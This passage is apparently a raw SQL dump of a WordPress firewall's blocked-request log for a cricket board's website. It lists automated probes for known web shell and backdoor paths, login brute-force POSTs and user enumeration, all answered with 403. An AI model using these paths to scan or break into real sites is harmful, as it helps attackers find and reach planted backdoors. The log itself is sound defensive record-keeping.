Safari\\/537.36\"}','dlLKJRkcmG2b8Fu057tV6xyp',0,1674982529.3781,160,'','POST',403,0,600,0,1,'',0),('20.14.130.192',336495296,'','https://yorkshirecricketboard.org.uk/wp-includes/css/modules.php','','{\"1\":\"python-requests\\/2.27.1\"}','RCS1MtiwlETIWxjKPeGAnYup',0,1674984671.7089,149,'','GET',403,0,700,0,1,'',0),('20.14.130.192',336495296,'','https://yorkshirecricketboard.org.uk/wso.php','','{\"1\":\"python-requests\\/2.27.1\"}','srBXpI0qumMDxHgifc8Vbka2',0,1674984672.7903,88,'','GET',403,0,700,0,1,'',0),('20.14.130.192',336495296,'','https://yorkshirecricketboard.org.uk/wp-content/plugins/upspy/index.php','','{\"1\":\"python-requests\\/2.27.1\"}','2BnEjy9uGdFVfKbC8Upt30QD',0,1674984673.6570,89,'','GET',403,0,700,0,1,'',0),('20.14.130.192',336495296,'','https://yorkshirecricketboard.org.uk/wp-content/plugins/ubh/index.php','','{\"1\":\"python-requests\\/2.27.1\"}','niexAUOTGB28wjMHLguRaKtD',0,1674984674.7942,94,'','GET',403,0,700,0,1,'',0),('20.14.130.192',336495296,'','https://yorkshirecricketboard.org.uk/wp-content/plugins/vwcleanerplugin/bump.php?cache','','{\"1\":\"python-requests\\/2.27.1\"}','KPGsHVFxqeE9cj63nwL5ZbB2',0,1674984675.8773,125,'','GET',403,0,700,0,1,'',0),('20.14.130.192',336495296,'','https://yorkshirecricketboard.org.uk/wp-content/plugins/xichang/x.php?xi','','{\"1\":\"python-requests\\/2.27.1\"}','k8JWgYN6saFPxnvi7pmRGDyl',0,1674984677.2619,96,'','GET',403,0,700,0,1,'',0),('20.14.130.192',336495296,'','https://yorkshirecricketboard.org.uk/wp-admin/shapes.php','','{\"1\":\"python-requests\\/2.27.1\"}','uJQLmS6n1bCxz4dp8W7e2ksD',0,1674984678.9541,104,'','GET',403,0,700,0,1,'',0),('20.14.130.192',336495296,'','https://yorkshirecricketboard.org.uk/olux.php','','{\"1\":\"python-requests\\/2.27.1\"}','HrJn8bDFm9ONuYMklRQPA2Bd',0,1674984680.0780,90,'','GET',403,0,700,0,1,'',0),('20.14.130.192',336495296,'','https://yorkshirecricketboard.org.uk/indoxploit.php','','{\"1\":\"python-requests\\/2.27.1\"}','lKatpAf0uOm7Qi58v4JnDTRc',0,1674984680.8011,123,'','GET',403,0,700,0,1,'',0),('20.14.130.192',336495296,'','https://yorkshirecricketboard.org.uk/up.php','','{\"1\":\"python-requests\\/2.27.1\"}','eWQROtT4NDEgVByMYUKpzaqr',0,1674984682.8701,99,'','GET',403,0,700,0,1,'',0),('20.14.130.192',336495296,'','https://yorkshirecricketboard.org.uk/upload.php','','{\"1\":\"python-requests\\/2.27.1\"}','IYFVLwB9e7OKy5NCdnQRDAMW',0,1674984684.4649,115,'','GET',403,0,700,0,1,'',0),('20.14.130.192',336495296,'','https://yorkshirecricketboard.org.uk/shell.php','','{\"1\":\"python-requests\\/2.27.1\"}','c39VQ0pwXNTnZAJgqaPGkW16',0,1674984688.4496,84,'','GET',403,0,700,0,1,'',0),('20.14.130.192',336495296,'','https://yorkshirecricketboard.org.uk/wp-admin/network/wp-footer.php','','{\"1\":\"python-requests\\/2.27.1\"}','f5K3SeAckhylRt2uFwsgUr7C',0,1674984689.7904,113,'','GET',403,0,700,0,1,'',0),('20.14.130.192',336495296,'','https://yorkshirecricketboard.org.uk/wp-info.php','','{\"1\":\"python-requests\\/2.27.1\"}','OrIY3Lb2MfmJ95ZVnvGqH4Po',0,1674984690.4821,92,'','GET',403,0,700,0,1,'',0),('20.14.130.192',336495296,'','https://yorkshirecricketboard.org.uk/wp-content/vuln.php','','{\"1\":\"python-requests\\/2.27.1\"}','BGIF0cys9NCtOvaeVAK2xwLd',0,1674984691.7515,347,'','GET',403,0,700,0,1,'',0),('20.14.130.192',336495296,'','https://yorkshirecricketboard.org.uk/upel.php','','{\"1\":\"python-requests\\/2.27.1\"}','avJhAdCQDVStlRyrO2xko8G0',0,1674984693.3805,90,'','GET',403,0,700,0,1,'',0),('20.14.130.192',336495296,'','https://yorkshirecricketboard.org.uk/wp-content/plugins/ppus/up.php','','{\"1\":\"python-requests\\/2.27.1\"}','0whXWHPBf5oq71JmbcGt9CrY',0,1674984694.1150,82,'','GET',403,0,700,0,1,'',0),('20.14.130.192',336495296,'','https://yorkshirecricketboard.org.uk/098.php','','{\"1\":\"python-requests\\/2.27.1\"}','VNtbuMsPa3jxT7mfZXIipLYq',0,1674984695.0985,119,'','GET',403,0,700,0,1,'',0),('20.14.130.192',336495296,'','https://yorkshirecricketboard.org.uk/V5.php','','{\"1\":\"python-requests\\/2.27.1\"}','3lA64PfvICzBOtTwSepu0Ncm',0,1674984695.9170,91,'','GET',403,0,700,0,1,'',0),('20.14.130.192',336495296,'','https://yorkshirecricketboard.org.uk/new_license.php','','{\"1\":\"python-requests\\/2.27.1\"}','n1qXhaedg3pilVbOsDmwMQR6',0,1674984696.7569,114,'','GET',403,0,700,0,1,'',0),('20.14.130.192',336495296,'','https://yorkshirecricketboard.org.uk/wp-content/plugins/theme-configurator/mini.php','','{\"1\":\"python-requests\\/2.27.1\"}','YnlLcBU3uzAEPkwZGX0S9FNM',0,1674984697.8666,144,'','GET',403,0,700,0,1,'',0),('20.14.130.192',336495296,'','https://yorkshirecricketboard.org.uk/wp-content/plugins/widget-logic/mini.php','','{\"1\":\"python-requests\\/2.27.1\"}','vGc0VlfFBLASQTzjsEk8qOa9',0,1674984698.8066,149,'','GET',403,0,700,0,1,'',0),('212.192.24.22',3569358870,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','nxKV7WkzqO9YprSXoyCesQIT',0,1674986334.6980,189,'','POST',403,0,600,0,1,'',0),('5.188.62.76',96222796,'','https://yorkshirecricketboard.org.uk/wp-login.php?wp_lang=en_US','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4895.86 Safari\\/537.36\"}','tN8xkGleAbWU9oZ6MYBJ1Sha',0,1674998746.3570,111,'','POST',403,0,600,0,1,'',0),('75.119.135.205',1266124749,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/52.0.2743.116 Safari\\/537.36\"}','63X4WQ0oDKpNVkR8LhHjSevY',0,1674998854.8411,1138,'','POST',403,0,600,0,1,'',0),('107.189.6.184',1807550136,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','VtAJzYdvFR8Oc5jXy7mHLUCk',0,1675001462.0715,121,'','POST',403,0,600,0,1,'',0),('209.141.45.47',3515690287,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','eDkNb6crwZLvqn8dyPx4BzGs',0,1675004012.8466,119,'','POST',403,0,600,0,1,'',0),('209.141.48.210',3515691218,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit\\/600.1.3 (KHTML, like Gecko) Version\\/8.0 Safari\\/600.1.3\"}','z0YJoRdFjeXTlnikPcC4Gp8S',0,1675006827.4725,145,'','POST',403,0,600,0,1,'',0),('74.208.190.148',1255194260,'','https://yorkshirecricketboard.org.uk/wsoyanzorng.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','wTinf8V3XSsF0CJK5dDjBlc9',0,1675008253.5327,98,'','GET',403,0,700,0,1,'',0),('74.208.190.148',1255194260,'','https://yorkshirecricketboard.org.uk/wp-includes/wsoyanzorng.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','dtkHTx2S6UhWncCjKs80wNXA',0,1675008263.4304,136,'','GET',403,0,700,0,1,'',0),('74.208.190.148',1255194260,'','https://yorkshirecricketboard.org.uk/wp-content/plugins/ccx/index.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','N1hV4ywRd6eD8SKJ3tbXr2iQ',0,1675008277.9176,135,'','GET',403,0,700,0,1,'',0),('74.208.190.148',1255194260,'','https://yorkshirecricketboard.org.uk/ccx/index.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','91OL3IVQwFfCSMbWuBXdq5gx',0,1675008290.0066,126,'','GET',403,0,700,0,1,'',0),('164.92.120.240',2757523696,'','https://www.yorkshirecricketboard.org.uk/wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\",\"2\":\"http:\\/\\/www.yorkshirecricketboard.org.uk\\/\\/\\/wp-json\\/wp\\/v2\\/users\\/\"}','ox9qINn3Z57trbdvPhWXFV8D',0,1675016843.9917,108,'','GET',403,0,520,0,1,'',0),('209.141.57.9',3515693321,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/35.0.1916.153 Safari\\/537.36\"}','q1KreJl0TahMt9ocDpF5NbA2',0,1675020072.2563,122,'','POST',403,0,600,0,1,'',0),('205.185.115.179',3451483059,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.143 Safari\\/537.36\"}','piTgIcu5aND4zfh2P96QbwnA',0,1675025814.8399,142,'','POST',403,0,600,0,1,'',0),('195.201.236.200',3284790472,'','https://www.yorkshirecricketboard.org.uk/wp-content/plugins/ioptimization/IOptimize.php?rchk','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','rI79XDb4HBe0vlKOhG2QzSPj',0,1675027615.3053,113,'','GET',403,0,700,0,1,'',0),('195.201.236.200',3284790472,'','https://www.yorkshirecricketboard.org.uk/wp-content/plugins/ioptimization/IOptimize.php?rchk','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','TFWmobelSMDLVv0rCNzH1BKJ',0,1675027617.9678,100,'','GET',403,0,700,0,1,'',0),('107.189.6.184',1807550136,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:31.0) Gecko\\/20100101 Firefox\\/31.0\"}','BswTMjUHhRfX9GnEFA5b78mt',0,1675029285.1711,120,'','POST',403,0,600,0,1,'',0),('198.98.49.240',3328324080,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit\\/537.51.2 (KHTML, like Gecko) Version\\/7.0 Mobile\\/11D167 Safari\\/9537.53\"}','kvMyLmwGFiCW70faq4bEs6eK',0,1675029690.5069,141,'','POST',403,0,600,0,1,'',0),('167.235.199.14',2817246990,'','https://yorkshirecricketboard.org.uk/wp-content/plugins/ioptimization/IOptimize.php?rchk','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','CUBE8wWdkmaehFGxH0MvusgI',0,1675029916.8870,137,'','GET',403,0,700,0,1,'',0),('167.235.199.14',2817246990,'','https://yorkshirecricketboard.org.uk/wp-content/plugins/ioptimization/IOptimize.php?rchk','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','HvQ6Mb0A4WrfjgY8RcEmzClx',0,1675029920.1249,141,'','GET',403,0,700,0,1,'',0),('5.188.62.140',96222860,'','https://yorkshirecricketboard.org.uk/wp-login.php?wp_lang=en_US','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/99.0.4844.84 Safari\\/537.36\"}','Dbm0Kf7EeaCVRpUvxkXqSnYT',0,1675035622.0861,138,'','POST',403,0,600,0,1,'',0),('195.201.236.200',3284790472,'','https://www.yorkshirecricketboard.org.uk/wp-content/themes/seotheme/mar.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','hrZRDaXP1E5TMY36bAc4Cxfq',0,1675037894.4436,121,'','GET',403,0,700,0,1,'',0),('195.201.236.200',3284790472,'','https://www.yorkshirecricketboard.org.uk/wp-content/themes/seotheme/mar.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','fM1eXcWN7rDtvGqo6YAlF98P',0,1675037910.3533,120,'','GET',403,0,700,0,1,'',0),('195.201.236.200',3284790472,'','https://www.yorkshirecricketboard.org.uk/wp-includes/shell20211028.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','nPeUxqbrK5HYyBTAIfOwgQCs',0,1675037943.9298,135,'','GET',403,0,700,0,1,'',0),('195.201.236.200',3284790472,'','https://www.yorkshirecricketboard.org.uk/wp-includes/shell20211028.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','J5zPg6HFYdfRBUva1sxQylAT',0,1675037954.9357,253,'','GET',403,0,700,0,1,'',0),('198.98.60.32',3328326688,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/35.0.1916.153 Safari\\/537.36\"}','bteEmIVZyCz7RhYgM0GxUsLT',0,1675038882.1315,154,'','POST',403,0,600,0,1,'',0),('198.98.49.240',3328324080,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','h5B30up4sDYPIlReTyqxQj7t',0,1675042457.6719,124,'','POST',403,0,600,0,1,'',0),('167.235.199.14',2817246990,'','https://yorkshirecricketboard.org.uk/wp-content/themes/seotheme/mar.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','LdYnPjt2KU87JDc5WvZSI9iN',0,1675045304.5251,550,'','GET',403,0,700,0,1,'',0),('167.235.199.14',2817246990,'','https://yorkshirecricketboard.org.uk/wp-content/themes/seotheme/mar.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','NaRGqJ5Ksh7lgjz2bdFmHnIi',0,1675045307.2872,101,'','GET',403,0,700,0,1,'',0),('167.235.199.14',2817246990,'','https://yorkshirecricketboard.org.uk/wp-includes/shell20211028.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','c8XODiNejl2qf9oUPKs06LAZ',0,1675045312.7123,722,'','GET',403,0,700,0,1,'',0),('167.235.199.14',2817246990,'','https://yorkshirecricketboard.org.uk/wp-includes/shell20211028.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','MDIoFup3wlTdHcXWAf09Q2Sv',0,1675045314.7434,444,'','GET',403,0,700,0,1,'',0),('167.235.199.14',2817246990,'','https://yorkshirecricketboard.org.uk/1index.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','I5NwJsgcKu8ikAyfVGrHmeFx',0,1675045318.7075,357,'','GET',403,0,700,0,1,'',0),('167.235.199.14',2817246990,'','https://yorkshirecricketboard.org.uk/1index.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','0BLPcHovSUzhQpAt1GgiRkYs',0,1675045320.4420,139,'','GET',403,0,700,0,1,'',0),('107.189.14.89',1807552089,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (iPad; CPU OS 7_1_1 like Mac OS X) AppleWebKit\\/537.51.2 (KHTML, like Gecko) Version\\/7.0 Mobile\\/11D201 Safari\\/9537.53\"}','cDXTqM8Yaxe04GrF52HpUVdo',0,1675046548.3366,222,'','POST',403,0,600,0,1,'',0),('195.201.236.200',3284790472,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\"}','dPugJsIfEwcHL9pZCmU0A5My',0,1675052522.4091,723,'','POST',403,0,600,0,1,'',0),('195.201.236.200',3284790472,'','https://www.yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\"}','vExrhwQno4Gcb9FC76VZJBed',0,1675052566.3405,183,'','POST',403,0,600,0,1,'',0),('5.75.202.35',88853027,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\"}','X0iJtRLzaBu5nyoTf4Ie86KQ',0,1675053702.3881,173,'','POST',403,0,600,0,1,'',0),('116.203.184.24',1959507992,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\"}','xSAqN5RtCh2cuPgs1E6BTl3K',0,1675054805.0404,185,'','POST',403,0,600,0,1,'',0),('159.69.189.243',2672147955,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\"}','A0Wuq5sKZVhinzPmfENyYwjJ',0,1675055862.6869,170,'','POST',403,0,600,0,1,'',0),('159.69.189.243',2672147955,'','https://www.yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\"}','w4aOp6zK2eH3fMNXjAsECvhI',0,1675055899.4245,135,'','POST',403,0,600,0,1,'',0),('188.34.187.187',3156392891,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\"}','ktTzvwQFsRp2WCqbnJBh15K6',0,1675056950.0275,227,'','POST',403,0,600,0,1,'',0),('188.34.187.187',3156392891,'','https://www.yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\"}','1Y8KEkwlcozIhmrsWP0bXLty',0,1675056986.9421,129,'','POST',403,0,600,0,1,'',0),('195.201.236.200',3284790472,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\"}','V5piPtFkhXE2weQn1lZrsdMz',0,1675058047.5753,146,'','POST',403,0,600,0,1,'',0),('195.201.236.200',3284790472,'','https://www.yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\"}','TWGzmat4EbiJnpBs7rjIPw9Y',0,1675058088.0540,119,'','POST',403,0,600,0,1,'',0),('159.69.189.243',2672147955,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\"}','8kW32jBE7Y5JMRGXPC9rLu0d',0,1675059124.7819,286,'','POST',403,0,600,0,1,'',0),('159.69.189.243',2672147955,'','https://www.yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\"}','3G2L1iKNoSX9hZb6lVm4dCjF',0,1675059160.8750,116,'','POST',403,0,600,0,1,'',0),('116.203.184.24',1959507992,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\"}','ykjnPNa17gmU3tpcO9owSVfG',0,1675060253.7841,195,'','POST',403,0,600,0,1,'',0),('116.203.184.24',1959507992,'','https://www.yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\"}','41TXtrgCunBxUJefFaVqR9d0',0,1675060299.9569,173,'','POST',403,0,600,0,1,'',0),('95.217.19.166',1608061862,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\"}','09bx82Trg1IoOYJRBLvF5Nsk',0,1675061314.2615,134,'','POST',403,0,600,0,1,'',0),('45.61.184.58',759019578,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:31.0) Gecko\\/20100101 Firefox\\/31.0\"}','usRe5FTcXZ6bJQWgNxk7A8UY',0,1675061330.1948,148,'','POST',403,0,600,0,1,'',0),('95.217.19.166',1608061862,'','https://www.yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\"}','C73mUc0e5zOA1KLpZ9FnMDxH',0,1675061353.3712,124,'','POST',403,0,600,0,1,'',0),('205.185.124.254',3451485438,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10.8; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','OnYsRjcek27LrVH8otJuf0F6',0,1675064624.8128,106,'','POST',403,0,600,0,1,'',0),('107.189.1.148',1807548820,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit\\/537.75.14 (KHTML, like Gecko) Version\\/7.0.3 Safari\\/537.75.14\"}','HiTBR8ELY2Csmnx9gyk5UzhQ',0,1675073831.8126,150,'','POST',403,0,600,0,1,'',0),('209.141.47.94',3515690846,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10.7; rv:31.0) Gecko\\/20100101 Firefox\\/31.0\"}','93slr1NMg4CZWnaTzBFGAVQL',0,1675073934.1473,123,'','POST',403,0,600,0,1,'',0),('85.215.104.244',1440180468,'','https://yorkshirecricketboard.org.uk/wsoyanzorng.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','bL1xvUjIDuFenf5rAVZ6Gs4w',0,1675086515.9375,114,'','GET',403,0,700,0,1,'',0),('85.215.104.244',1440180468,'','https://yorkshirecricketboard.org.uk/wp-includes/wsoyanzorng.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','UMLrwqoRkD8eNyf0sVWYO1Ib',0,1675086525.6952,594,'','GET',403,0,700,0,1,'',0),('85.215.104.244',1440180468,'','https://yorkshirecricketboard.org.uk/wp-content/plugins/ccx/index.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','XYUROhl6ZQALJ3wMKuVBH8mv',0,1675086566.3777,95,'','GET',403,0,700,0,1,'',0),('85.215.104.244',1440180468,'','https://yorkshirecricketboard.org.uk/ccx/index.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','7UPQg6wmqRa4zT5iyNkYnKHW',0,1675086587.8095,145,'','GET',403,0,700,0,1,'',0),('208.97.181.78',3496064334,'','https://yorkshirecricketboard.org.uk/wp-reset.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','ybVap6OGSut1kfQZjDTmcW4l',0,1675090285.3414,553,'','GET',403,0,700,0,1,'',0),('208.97.181.78',3496064334,'','https://yorkshirecricketboard.org.uk/wp-setups.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','rjBF9dE3bCZ0fwu4J2XRAIGy',0,1675090286.1556,563,'','GET',403,0,700,0,1,'',0),('208.97.181.78',3496064334,'','https://yorkshirecricketboard.org.uk/about.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 